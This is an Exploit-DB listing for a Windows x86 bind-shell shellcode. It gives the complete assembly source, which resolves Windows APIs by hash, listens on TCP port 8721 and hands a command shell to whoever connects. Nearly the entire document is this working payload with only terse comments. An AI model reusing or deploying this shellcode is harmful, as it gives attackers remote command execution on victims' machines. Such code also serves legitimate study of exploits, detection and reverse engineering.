Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)

2009-01-01T00:00:00
ID EDB-ID:43759
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00

Description

Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes). Shellcode exploit for Windows_x86 platform

                                        
                                            ;      Title:  Win32 Bind Shell
;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
;   Function:  Listen for connection and spawn command shell
;     Author:  hdm[at]metasploit.com

; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm


[BITS 32]

global _start

_start:

LCaller:
    call LLoadFunctions

LDataSegment:
;========================

dd "CMD"

dd 0x79c679e7 ; closesocket             12
dd 0x498649e5 ; accept                  16
dd 0xe92eada4 ; listen                  20
dd 0xc7701aa4 ; bind                    24
dd 0xadf509d9 ; WSASocketA              28
dd 0x3bfcedcb ; WSAStartup              32

dd 0xec0e4e8e ; LoadLibraryA            36
dd 0x73e2d87e ; ExitProcess             40
dd 0xce05d9ad ; WaitForSingleObject     44
dd 0x16b3fe72 ; CreateProcessA          48

db "WS2_32.DLL", 0x00, 0x01
;========================

LLoadFunctions:	
    pop ebx  
    push esp
	mov ebp, esp 
    mov [ebp], ebx

LKernel32Base:
    push byte 0x30
    pop ecx
    mov eax, [fs:ecx]
	mov eax, [eax + 0x0c] 
	mov esi, [eax + 0x1c] 
	lodsd				  
	mov ebx, [eax + 0x08] 
    jmp short LStartLoading

LLoadWinsock:
    lea edx, [edi + 44] ; get address of ws2_32.dll
    push ecx            ; save counter
    push edx            ; push address of ws2_32.dll
	call eax            ; LoadLibraryA()
    mov ebx, eax        ; save module handle 
    pop ecx             ; restore counter
    jmp short Looper2
    
LStartLoading:
    ; Start loading addresses at ebp + 12
    push byte 0x08
    pop esi
    add esi, ebp 

    ; Function counter
    push byte 0x0a
    pop ecx
    mov edi, [ebp]
    
Looper:
    cmp cl, 0x06
    je short LLoadWinsock

Looper2:    
    push ecx                    ; save the counter
    push ebx                    ; dll handle
    push dword [edi + ecx*4]    ; function hash value
    call LGetProcAddress        ; find the address
    pop ecx                     ; restore the counter
    mov [esi + ecx * 4], eax    ; stack segment to store addresses
    loop Looper
	xor edi, edi

LWSAStartup:
	; WSAStartup(0x101, DATA) 
    sub sp, 400
	push esp
	push 0x101
	call [ebp + 32]

LWSASocketA:
	; WSASocketA(2,1,0,0,0,0) 
	push edi
	push edi
	push edi
	push edi
	inc edi
	push edi
	inc edi
	push edi
	call [ebp + 28]
	mov ebx, eax                ; save socket to ebx
    xor edi, edi
    
LBind:
	push edi
	push edi
	push dword 0x11220002 ; port 8721
	mov esi, esp
	push byte 0x10        ; length
	push esi
	push ebx
	call [ebp + 24]

LListen:
	push edi
	push ebx
	call [ebp + 20]

LAccept:
	push edi
	push esi
	push ebx
	call [ebp + 16]
	mov edx, eax

LCreateProcessStructs:
	; allocate space for STARTUPINFO, PROCESS_INFORMATION 
	sub sp, 0x54

	; zero out SI/PI 
	lea edi, [esp]
	xor eax, eax
    push byte 21
    pop ecx
    
LBZero:
	rep stosd
    
    mov edi, edx
	mov byte [esp + 16], 68	 ; si.cb = sizeof(si) 
	inc byte [esp + 61]		 ; si.dwFlags = 0x100 

	; socket handles 
	mov [esp + 16 + 56], edi
	mov [esp + 16 + 60], edi
	mov [esp + 16 + 64], edi

	lea eax, [esp + 16]	; si 
	push esp			; pi 
	push eax
	push ecx
	push ecx
	push ecx
    
    inc ecx
	push ecx
    dec ecx
    
	push ecx
	push ecx
	push dword [ebp]
	push ecx

LCreateProcess:
	call [ebp + 48]
	mov ecx, esp
    
LWaitForSingleObject:
    push 0xFFFFFFFF
    push dword [ecx]
    call [ebp + 44]

LCloseSocket:
    push edi
    call [ebp + 12]

LFinished:
    call [ebp + 40]
  
LGetProcAddress:
	push ebx
	push ebp
	push esi
	push edi
	mov ebp, [esp + 24]			
	mov eax, [ebp + 0x3c]		
	mov edx, [ebp + eax + 120]
	add edx, ebp				
	mov ecx, [edx + 24]			
	mov ebx, [edx + 32]
	add ebx, ebp

LFnlp:

	jecxz	LNtfnd
	dec ecx
	mov esi, [ebx + ecx * 4]
	add esi, ebp				
	xor edi, edi
	cld

LHshlp:

	xor eax, eax
	lodsb
	cmp al, ah
	je LFnd
	ror edi, 13
	add edi, eax
	jmp short LHshlp

LFnd:
	
	cmp edi, [esp + 20]
	jnz LFnlp
	mov ebx, [edx + 36]			
	add ebx, ebp
	mov cx, [ebx + 2 * ecx]		
	mov ebx, [edx + 28]			
	add ebx, ebp
	mov eax, [ebx + 4 * ecx]	
	add eax, ebp
	jmp short LDone

LNtfnd:
	xor eax, eax

LDone:
	mov edx, ebp
	pop edi
	pop esi
	pop ebp
	pop ebx
	ret 8